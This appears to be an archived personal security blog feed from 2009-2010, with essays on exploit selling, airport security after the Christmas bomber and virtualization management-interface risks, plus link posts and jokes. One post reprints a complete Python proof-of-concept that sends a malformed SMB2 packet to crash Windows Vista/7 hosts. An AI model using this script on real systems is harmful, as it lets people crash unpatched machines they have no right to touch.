Mod-Blackurity (without imported items)

(Image)

Fri, 19 Feb 2010 09:37:27 GMT

Once you're sold, you can't stop.

Fri, 15 Jan 2010 09:54:08 GMT

Some of you know I'm quite hostile towards selling exploits and vulnerabilities.
I've debated the thing with a lot of friends, and still can't see the actual difference with selling weapons, nor I can buy the "I get paid for my work" attitude. I can see too many flaws in the logic... but never mind, this is not the point of the post.

I've just been made aware of GenApple, https://www.genapple.com/. GenApple is a startup allowing people to sell their knowledge.
Right now, the site is full of recipes, cheat codes and "how to get rich fast" documents.

However, it made me wonder: what if the underground community actually starts using one of these tools?
It is a scenario that cyberpunk readers are familiar with: in Stephenson's Snow Crash selling data is what the main character (Hiro Protagonist, btw) does for a living.
But what if all of sudden such scenario goes real?

Right now, hackers go to conferences for free (well, most of them and most of the conferences). They share their knowledge for the sake of it, and for a little celebrity maybe, which in turn can become money at some point.
Yet, the hacker community has always been driven by the idea that "information wants to be free". Maybe not for everybody - we've always got "inner circles of whatever" - but yet miles away from the idea of actually selling a new attack or defense technique.

People advocating selling exploits always told me: I'm only selling the actual code, I'll let the technique out and skilled people and the security community as a whole can then write the code and find the bug by themselves. As a "science", security will go on anyway, they told me.
Now I wonder: if they were actually offered money for their techniques - say, $10k for a way to bypass stack protection on VISTA or something similar - what would they do?

A lot of people say that some hackers resemble rock stars. In the rock/metal community, there's a saying: "to sell out". I wonder if the same is true for knowledge, not just for code. Once you sell out, it's hard to stop.
No more free bugs. No more free techniques. No more free security. No more security?

Since there's a lot of bullshit flying around...

Wed, 06 Jan 2010 16:19:45 GMT

I figured I would share some thoughts here on what happened in airports (and mainly on the media) since December 25.

First, let's recapitulate what happened (to the best of our knowledge): a young man, Umar Farouk Abdulmutalla, 23 years old from Nigeria, tried to ignite an explosive mixture, part of which he brought on board in his trouser or pants, and part in a syringe of liquid.

He was stopped by the reaction of the passengers and the crew (which is one of the implicit security measures implemented after 9/11, when we learned that suicide terrorists could seize planes; along with armored cabin doors, one of the two effective measures adopted afterwards).

He was also apparently unable to set off the device, which was apparently not working. This is not a secondary note. The device was not working because of the screening at airports (mainly, the magnetometer screening), which makes it difficult to bring on board metallic detonators.

So this case is an excellent example of how the current security measures were able to foil a terrorism attempt.

Since a lot of idiotic things have been said, the youngster wasn't on the no-fly list, because there simply wasn't enough evidence to place him on it. He held a valid visa, and was regularly boarded. If you wish to deny boarding to anybody with just one alert flag raised, you'd better spend a lot of money on trains, because there's a lot of people who will be grounded (in most cases, without any reason). You are also introducing a "guilty until proven innocent" approach which is not extremely pleasant, either.

It is simply impossible to connect all the dots that we are connecting now, beforehand, for each single passenger. It doesn't scale. Forensic investigations are easier than prevention, it is a fact of life.

It is similarly idiotic to advocate implementing the same security measures they run in Israel, for instance, in all airports worldwide. They simply don't scale:El Al is a small, well-run airline, with 38 aircraft, 46 destinations, and fewer than two million passengers a year. That's smaller than Alitalia, and this says a lot. Delta (now merged with Northwest) has hundreds and hundreds of planes, flying to somewhere close to a thousand cities. They don't scale airport-wise either. Ben Gurion, Israel’s primary international airport, serves between 10 and 12 million passengers. Amsterdam serves 5 times as much, most times on connecting flights, and I don't even want to think about Atlanta!

This is not to say airport security is as good as it should be. There's a lot of things you could do better (for instance you could screen passengers at the gate, so you don't create crowds, and if something goes wrong you don't have to evacuate an entire airport to fix it).

It costs more, sure, but nowhere near what the new "body imaging scanners" will cost us. Sure, what's the cost, if it makes us more secure? Well, there's a couple of points worth making.

Firstly, the full scanners wouldn't stop another bomber such as Umar Farouk Abdulmutalla. It's not me saying it, nor some other silly security expert. It's a company who has been developing those scanners, QinetiQ. It's worth repeating: had the Christmas Bomber gone through those new shiny scanners, they wouldn't have catched him. Just for reference, here are the links on the two technologies that can be used: Millimeter wave, or Backscatter X-Ray. The scanner QinetiQ tested is the first one, which is also the one likely to be deployed because it creates less health risks. The other however is likely to be just as ineffective against such explosive materials as the one used by Umar Farouk.

In second place, even if our own Minister Frattini (a notorious expert on freedom and technology) begs to differ, since privacy (more accurately, the right to preserve your dignity, in this case) is a significant part of your personal security, sacrificing privacy to obtain security is like fucking for virginity. If you sacrifice privacy, you damn well want to make sure you are gaining a lot from it. In this case you are gaining nothing at all. And I don't even want to think about child pornography issues.

I don't even wish to comment on the idiotic restrictions planned by TSA, and immediately broadcast by our idiotic media, such as keeping people sitting down (and peeing their pants, if needed) for an hour; preventing them to have a book in their lap; or shutting down WiFi (DAMN!!! They just finally got around to roll it out!). As Bruce said on the new restrictions: "I wish that, just once, some terrorist would try something that you can only foil by upgrading the passengers to first class and giving them free drinks".

After public outcry, someone got back into their minds over at TSA and they rolled back those restriction, rolling out instead two other wonderful ideas:
1) randomized checks, which were promptly debunked by Matt Blaze
2) a racist approach to profiling, whereby citizens of 14 more-or-less random nations will be subject to pat down searches. Debunked by Schneier and others (because of course it's ineffective from the beginning: think of the "sneaker bomber" Reid who was a British citizen...), this has another nice effect: turns out that pat down searches are actually less effective than other measures, not more effective.

So, while we wait for President Obama (who has shown to be a sensible and cautious leader during this turmoil) to do the right thing to make flying safer and more comfortable, and close down TSA completely, what can we do to protect ourselves from terrorism, which is called like that for a reason?

It's pretty simple. Refuse to be terrorized. Flying is safer than driving to the airport. Flying is probably safer than standing in line for the security checks, for all we know.

Flying is surely safer than having incompetent, freedom-disdeigning, unprofessional and idiotic politicians in charge. Quousque tandem?

[Reposted from raistlin]

(Image)

Tue, 05 Jan 2010 10:20:25 GMT

Hey pal, this was one of the things we've evaluated when we've built the Masi...

Tue, 08 Dec 2009 23:40:32 GMT

[Reposted from raistlin]

Hey pal, this was one of the things we've evaluated when we've built the Masibty SQL module, remember? We're doing better by design (but their is released, ours isn't, which beats us a ton to 0) :-)

A screenshot from the registration process at my new bank, let me translate t...

Sun, 29 Nov 2009 12:22:12 GMT

A screenshot from the registration process at my new bank, let me translate this for you. "In order to verify your password is strong enough, search for it on Google and check if there are less than 10 results then it's a good password." I won't even go into detailed comments on this one, it speaks for itself.

The better part?
The whole homebanking portal does not have a clue about sslstripping: no way to directly get in through SSL, you HAVE to do so in HTTP. Even better, once you login you get an iframe based website where the frame container is http (so it's http in your address bar) and the frames are HTTPS... hopefully! Ok, time to recode my own https client for their portal... WTF, I can't find even one good hb portal in Italy.
Either they don't work, or I know they're exploitable or they're utterly insane!

BEST

Mon, 28 Sep 2009 20:52:03 GMT

BEST
CASE
EVER

A stick figure guide to AES

Sun, 27 Sep 2009 16:54:31 GMT

A stick figure guide to AES

"All'INPS è già un traguardo arrivare al risponditore automatico. E spesso non..."

Mon, 14 Sep 2009 09:22:11 GMT

"All'INPS è già un traguardo arrivare al risponditore automatico. E spesso non risponde manco quello.
L'ultima frontiera della voglia di lavorare."

–Silvia

Microsoft and Cisco finally patched Sockstress' vulnerability (Outpost 24 an...

Wed, 09 Sep 2009 16:58:30 GMT

Microsoft and Cisco finally patched Sockstress' vulnerability (Outpost 24 and such). Still years of fun with twenty years old attacks to go.

The Vista / 7 which is actually 2008 as well is actually REMOTE CODE EXECUTION, not DOS.

Wed, 09 Sep 2009 16:53:03 GMT

The Vista / 7 which is actually 2008 as well is actually REMOTE CODE EXECUTION, not DOS.
Oh My GOD!

Windows 7 / Vista Remote DOS 0-Day

Tue, 08 Sep 2009 16:03:57 GMT

#Credits to Laurent Gaffie
Smb-Bsod.py:

#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

Remote DOS via Linux PAM

Tue, 08 Sep 2009 15:54:22 GMT

I wonder the size of the impact, could be huge! (apart from the "funny" escalation condition...)

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0887

Oct 21, 2009: SEaCURE.it Preview

Tue, 08 Sep 2009 12:04:44 GMT

08:00–Oct 23, 2009 19:00 @ Milano, FieraMilanoCity

The first international information security conference in Italy. 2 days of top notch trainings (SAP and Oracle hacker-level security) and 1 day of conference with bleeding edge talks (Snow Leopard hacking, SAP exploiting and great insights on the underground economy, among the others).

via Petabytes on a budget: How to build cheap cloud storage | Backblaze Blog

Tue, 08 Sep 2009 11:59:17 GMT

via Petabytes on a budget: How to build cheap cloud storage | Backblaze Blog

[Reposted from FreXxX via fbogner]

Sign from God

Tue, 08 Sep 2009 11:55:35 GMT

Sign from God

[Reposted from torskee via wolfhesse]

The Titan Engine

Tue, 08 Sep 2009 11:54:10 GMT

http://www.reversinglabs.com/products/TitanEngine.php

(Image)

Fri, 04 Sep 2009 17:26:29 GMT

[Reposted from wojtku via wolfhesse]

(Image)

Fri, 04 Sep 2009 17:25:51 GMT

[Reposted from raistlin via wolfhesse]

An article by my old friend Alessio

Tue, 01 Sep 2009 13:26:52 GMT

http://www.cultumedia.it/speciali/92-re-a-volte-ritornano-/684-gorbacev-contro-baggio-gli-anni-90-fuori-di-casa.html

Just installed apache2.2.12 on Ubuntu Jaunty to enable NSI: just add the karm...

Tue, 01 Sep 2009 09:26:18 GMT

Just installed apache2.2.12 on Ubuntu Jaunty to enable NSI: just add the karmic repository to apt sources and apt-get install apache2.2-bin

Slowloris, blocking Apache with just one computer.

Sun, 30 Aug 2009 10:32:05 GMT

http://ha.ckers.org/slowloris/

Using StartSSL free certificates on dovecot

Thu, 27 Aug 2009 10:53:38 GMT

In order for everything to work properly, you have to chain all the certificates in the same file, like this
cat Your_cert.pem Chain_oF_Certificates.pem CA.pem > cert_for_dovecot.pem
And that's it.

Reference based compression

Sat, 15 Aug 2009 17:15:32 GMT

Thinking about reference-based compression. Each sequence of bytes is not stored in the file but referenced with an URL to an external resource and starting and ending byte. I wonder if it would work or we've not yet enough entropy on the internet (or maybe our search engines won't allow for such a research).

Storing binary files via tweeter

Sat, 15 Aug 2009 17:13:49 GMT

I was thinking about sharing some file directly through tweeter, started coding the PHP base64 stuff, then decided to check if it was new stuff or not. Turns out, it wasn't. :P

http://lukehatcher.com/2009/05/storing-binary-data-in-twitter/

Real world security in a virtual infrastructure

Thu, 16 Jul 2009 19:08:11 GMT

I've just posted a new article on my column @ virtualization.info.

Welcome back to the new virtualization.info security column. We started with a series about the real-worlds security risks of virtual infrastructures and our first part, published last week, was specifically about the risks related to the virtual machines templates.
Today it’s time to talk about the risks of virtual infrastructures management interfaces.

Most of the security experts working in the virtualization industry have none but one nightmare: guest-to-host exploitation.
That is, an almost magical attack which can be run from a guest virtual machine - maybe even with non-administrative privileges -resulting in the attacker taking over the host system. This is by far the most dreaded situation, the one incarnating every fear, the one triggering the "I said so" quote from the virtualization skeptics.
While we already have seen such an event at least once with the Cloudburst exploit, its impact has been limited to a specific, desktop oriented product, leaving enterprises safe and security administrators wondering.
Such attacks are regarded as the Holy Grail, the Real Issue from a technical perspective: researchers are presenting incredibly advanced attacks leveraging hardware issues and defeating low-level instruction set security.

However, in my opinion these concerns and attacks, even though they surely have a place in the whole scheme of virtualization security, are dramatically overstated.
Almost no one, until now, has seriously analyzed what could be considered as being the most important threat to virtualization environments: support and management infrastructures vulnerabilities.
Hypervisors are notoriously complex pieces of software, quite hard to attack: they can easily be minimal (it has even been said that most amount to an handful of thousands line of code), often written by hardcore coders who have strong security and software engineering skills and maybe running over some rather obscure operating system (see the Nemesis-XEN case).

While this is not always true for every virtualization software, an attacker usually has an extremely hard time finding flaws in these systems - let alone develop a reliable exploit which can be "safely" used in an enterprise environment without the risk of a noisy denial of service side-effect.
Aggressors, however, are very fond of attacking the soft spots in hardened architectures. In the case of virtualization, the soft spots often are those providing management functions or supporting non-core functionalities.

If we take a look at the security advisories released by virtualization vendors we have multiple examples supporting this claim. VMware ESX, for example, has been vulnerable to a remote attack which could lead to exploitation and takeover of the host system: the vulnerability, two buffer overflows, lied in the Openwsman component in both ESXi and ESX and could result in remote code execution, which in turn means host and guests takeover (something that will further explore in a future article of this series).

We should not forget that even if hypervisor vendors are rewriting large chunks of code for basic services as well, they are still leveraging standard technologies for core functionalities: the Openwsman bug was discovered by the Novell SUSE security team and is otherwise unrelated to virtualization technologies.
That is, non-virtualization issues are suddenly very, very interesting for virtualization-specific security.

Yet, there's more: web interfaces.
As the security industry is well aware of, web applications are by far the biggest source of attacks these days. A lot can be said about the reasons for this low level of security, but for our analysis we will just take it for granted: a lot - most - of web applications are affected by security bugs. Even well-known, audited applications which have been around for years without significant changes to their code base. New attacks are developed (nobody knew about HTTP Parameter Pollution some months ago) and known attack vectors are refined, thus potentially exposing even very secure web applications to new risks.
What's more, the application stack is often a prime target for attackers, being so complex and thus error-prone: exploits aimed at application servers are on the rise and the mean time between critical bugs being discovered on such software is quite short comparing to the industry average.

This is exactly the environment where management web interfaces are living. Most virtualization vendors are providing – either as a core part of their virtualization solution or as an external "plugin", appliance or similar artifacts - web interfaces capable of performing at the very least some core administrative tasks like starting up or shutting down virtual machines.
These interfaces are nothing more than web applications running on nothing less than a full fledged application server stack: even though some of the daemons serving the application can totally or partially be custom made, most of the times we are only seeing standard web and application servers. It must also be noted that custom made code, when handling such a difficult challenge as running a web and application server, has been shown to have a lower level of security of most standard solutions.

What is, then, a real-world aggressor going to attack? Most likely, he is going to hunt for issues in the web-based management interface or the underlying stack, which are by far the easiest prey.
While it is surely true that most vendors are strongly encouraging users to restrict access to administrative consoles on a management network, this best practice has not yet been backed up by real threats and is thus largely ignored.
Unfortunately, attacks against management interfaces are showing up more and more frequently - like the recent XENCenterWeb exploits - and what's even more of a threat to organizations, most of them will work on older releases as well. Even if virtualization vendors promptly patch security issues in, say, Tomcat, there still will be a certain vulnerability window while the upgrade is tested and deployed. Previous experience tells us that vendors are taking as long as 5 months to release a security fix in an application server running a web-based management interface once it has been made available by its developers.

Is this a real issue "today"? Should you make sure no interface can be ever reached from the network? Definitely.
Webapp-targeted 0-Day attacks (that is, attacks which are unknown to the community since they leverage undisclosed and thus unpatched bugs) are way more common than old fashioned exploits targeting network daemons, and the timeframe between disclosure of a bug affecting an application server or of a new web application attack technique and the development of working exploits is very, very narrow...

Virtualization users should stop worrying about unlikely or extremely complex attacks - at least until they become feasible for the average skilled attacker - and start taking care of those low hanging fruits their interfaces are giving to aggressors.
A worm for web-based virtualization management interfaces is just a couple of public exploits away from now.

The power of stupidity.

Tue, 30 Jun 2009 13:10:23 GMT

http://gandalf.it/stupid/book.htm

Stupefacente

Thu, 25 Jun 2009 17:10:32 GMT

Stupefacente

I don't usually do politics here, but this is too damned funny

Tue, 26 May 2009 15:00:33 GMT

I don't usually do politics here, but this is too damned funny

Best business card video ever, this time for real :D

Tue, 21 Apr 2009 10:43:27 GMT

Best business card video ever, this time for real :D

Best business card video ever.. almost

Tue, 21 Apr 2009 10:43:04 GMT

Best business card video ever.. almost

"New tools and vulnerabilities presented at Black Hat EU this year include: -..."

Mon, 13 Apr 2009 18:49:33 GMT

New tools and vulnerabilities presented at Black Hat EU this year include:

- New Tool
– Masibty: a Web Application Firewall Based on Anomaly Detection by
Stefano Zanero and Claudio Criscione - New Tool

–IT Management » Blog Archive » New Vulnerabilities and Tools on Showcase at Black Hat Europe

[Reposted from raistlin]

Things happen rama rama. Drop a line if I can help.

Mon, 13 Apr 2009 18:49:28 GMT

[Reposted from snagg]

Things happen rama rama. Drop a line if I can help.

PHP SafeMod bypass using CURL

Fri, 10 Apr 2009 19:09:52 GMT

http://securityreason.com/achievement_exploitalert/11

This one is even better: an easter Platypus!

Fri, 10 Apr 2009 16:13:24 GMT

This one is even better: an easter Platypus!

Pure genius! Downloadable Memory game

Fri, 10 Apr 2009 16:11:43 GMT

Pure genius! Downloadable Memory game

For anyone fighting with 1GB ESXi hosts

Wed, 01 Apr 2009 09:02:50 GMT

http://www.jeremyroe.net/?p=102

(Image)

Wed, 01 Apr 2009 09:02:21 GMT

[Reposted from wytukaze via fbogner]

US-CERT Vulnerability Note VU#845747

Mon, 16 Mar 2009 10:31:48 GMT

The PTK sleuthkit interface contains multiple vulnerabilities. If exploited, these vulnerabilities may allow an attacker to gain elevated privileges or conduct XSS attacks.

http://www.kb.cert.org/vuls/id/845747

[Reposted from raistlin]

The best miniature game EVER!

Sat, 21 Feb 2009 11:28:04 GMT

http://www.somethingawful.com/d/news/boxageddon-miniature-game.php